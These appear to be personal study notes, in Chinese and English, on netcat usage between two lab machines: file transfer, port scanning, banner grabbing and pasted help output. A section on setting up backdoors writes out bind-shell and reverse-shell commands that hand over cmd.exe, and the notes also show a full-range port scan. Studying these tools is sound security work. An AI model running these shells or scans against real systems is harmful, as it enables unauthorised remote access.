Windows:192.168.2.1
Ubuntu:192.168.2.9
c/s
(W)s:
nc -l -p 4444 -l listen -p port
(U)c:
nc 192.168.2.1 4444
echo shell:
(W)s: nc -l -p 4444 -e cmd.exe //-e 执行某个程序,建立后门
(U)c: nc 192.168.2.1 4444
file transfer:
c->s
(W)s: nc -l -p 4444 > out.file
(U)c: nc 192.168.2.1 4444 < input.file
s->c
(W)s: nc -l -p 4444 < input.file
(U)c: nc 192.168.2.1 4444 > out.file
set time wait:
-w3 wait 3s
端口扫描
nc -v -n -z -w1 [ip_addr] [port]
-v : 对错误进行详细输出
-n: 不对目标机器进行DNS解析,直接采用IP
-z: zero I/O,用于端口扫描,加快速度
-w1: 超时1s
扫描某Linux系统端口开放情况
(W) nc -n -v -w1 -z 192.168.2.9 1-65535
banner抓取
(U)echo " " | nc -v -n -z -w1 192.168.2.1 1-1000
建立后门:
标准I/O流
监听型后门
(W)s: nc -l -p 4444 -e cmd.exe
(U)c: nc 192.168.2.1 4444
连接型后门
(U)s: nc -l -p 4444
(W)c: nc 192.168.2.9 -e cmd.exe
s@ubuntu:~$ nc -h
OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-b Allow broadcast
-C Send CRLF as line-ending
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-I length TCP receive buffer length
-i secs Delay interval for lines sent, ports scanned
-j Use jumbo frame
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-O length TCP send buffer length
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address
-T toskeyword Set IP Type of Service
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-V rtable Specify alternate routing table
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-Z DCCP mode
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]